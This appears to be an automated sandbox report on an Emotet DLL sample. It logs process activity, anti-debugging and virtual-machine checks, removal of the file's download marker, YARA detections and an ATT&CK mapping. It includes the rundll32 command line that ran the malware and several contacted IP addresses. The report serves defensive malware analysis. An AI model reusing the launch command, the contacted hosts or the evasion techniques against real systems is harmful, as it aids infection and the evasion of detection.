                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: 2gyA5uNl6VPQUA.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 2gyA5uNl6VPQUA.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093151C push ds; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093150F push ds; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9E9153 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D150F push ds; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012D151C push ds; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E9153 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120150F push ds; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120151C push ds; ret
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9CE4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Qrcyfrqyrevqn\zfjlg.mpdJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qrcyfrqyrevqn\zfjlg.mpd:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 6160Thread sleep time: -150000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9E2FE7 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E2FE7 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012018AC FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01201750 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120183F FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.19.drBinary or memory string: VMware
                      Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.19.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.19.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: rundll32.exe, 00000019.00000003.795038474.000000000115E000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.815929088.0000000001137000.00000004.00000020.sdmp, rundll32.exe, 00000019.00000002.816002840.000000000115E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.713723013.0000023EE5C70000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.713872119.0000023EE5CE5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.19.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9DD1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9CE4E0 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9C1290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00944315 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9DC050 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9DBFE0 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9DBFE0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9E12CB mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9E298C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012E4315 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9DC050 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9DBFE0 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9DBFE0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E12CB mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E298C mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01214315 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093E259 LdrInitializeThunk,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9DCB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9DD1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9E29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9DCB22 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9DD1CC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E29E6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 46.55.222.11 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6376 -ip 6376
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 304
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6376 -ip 6376
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 308
                      Source: svchost.exe, 00000000.00000002.816329484.000001D51B790000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.575281363.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.585221007.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.586969396.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.578890630.00000000010A0000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.817345899.0000000003560000.00000002.00020000.sdmpBinary or memory string: Program Manager
                      Source: svchost.exe, 00000000.00000002.816329484.000001D51B790000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.575281363.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.585221007.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.586969396.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.578890630.00000000010A0000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.817345899.0000000003560000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: svchost.exe, 00000000.00000002.816329484.000001D51B790000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.575281363.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.585221007.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.586969396.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.578890630.00000000010A0000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.817345899.0000000003560000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: svchost.exe, 00000000.00000002.816329484.000001D51B790000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.575281363.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.585221007.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.586969396.00000000010A0000.00000002.00020000.sdmp, loaddll32.exe, 00000001.00000000.578890630.00000000010A0000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.817345899.0000000003560000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9DCC44 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9DCE15 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: Amcache.hve.19.dr, Amcache.hve.LOG1.19.drBinary or memory string: c:\users\user\desktop\procexp.exe
                      Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.19.dr, Amcache.hve.LOG1.19.drBinary or memory string: procexp.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.812098.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.f90000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.930000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.7e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.eb2170.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.f90000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.eb2170.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.852098.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.rundll32.exe.1200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.rundll32.exe.1200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.ec0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.852098.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.570000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.930000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.570000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.f42468.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.a63b70.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.f42468.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.a63b70.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.812098.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000003.778115242.000000000112B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.578776757.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.578455384.00000000007FA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.596108665.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.595999827.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.549793958.0000000000F90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.663770243.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.578639964.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.586858412.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.578325190.0000000000570000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.816294229.0000000001200000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.513859712.0000000003649000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.586723752.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.584768753.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.663823655.0000000000F2A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.585019489.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.567434432.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.564974375.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.538768779.0000000000E9A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.550893742.00000000012D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.557633995.00000000007E0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.557657494.000000000083A000.00000004.00000020.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsNative API1Path InterceptionProcess Injection112Masquerading21OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery41Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptHidden Files and Directories1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRundll321DCSyncSystem Information Discovery24Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobFile Deletion1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 532048 Sample: 2gyA5uNl6VPQUA.dll Startdate: 01/12/2021 Architecture: WINDOWS Score: 88 44 210.57.217.132 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->44 46 203.114.109.124 TOT-LLI-AS-APTOTPublicCompanyLimitedTH Thailand 2->46 48 26 other IPs or domains 2->48 54 Sigma detected: Emotet RunDLL32 Process Creation 2->54 56 Found malware configuration 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 2 other signatures 2->60 9 loaddll32.exe 1 2->9         started        11 svchost.exe 3 4 2->11         started        13 svchost.exe 4 2->13         started        15 4 other processes 2->15 signatures3 process4 process5 17 rundll32.exe 2 9->17         started        20 cmd.exe 1 9->20         started        22 rundll32.exe 9->22         started        28 3 other processes 9->28 24 WerFault.exe 11->24         started        26 WerFault.exe 11->26         started        signatures6 52 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->52 30 rundll32.exe 17->30         started        32 rundll32.exe 20->32         started        34 rundll32.exe 22->34         started        36 rundll32.exe 28->36         started        process7 process8 38 rundll32.exe 30->38         started        42 rundll32.exe 32->42         started        dnsIp9 50 46.55.222.11, 443, 49806 BALCHIKNETBG Bulgaria 38->50 62 System process connects to network (likely due to code injection or exploit) 38->62 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      2gyA5uNl6VPQUA.dll18%VirustotalBrowse

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.2.rundll32.exe.7e0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      1.0.loaddll32.exe.930000.9.unpack100%AviraHEUR/AGEN.1110387Download File
                      1.0.loaddll32.exe.930000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      4.2.rundll32.exe.f90000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      1.2.loaddll32.exe.930000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      1.0.loaddll32.exe.930000.6.unpack100%AviraHEUR/AGEN.1110387Download File
                      25.2.rundll32.exe.1200000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.ec0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
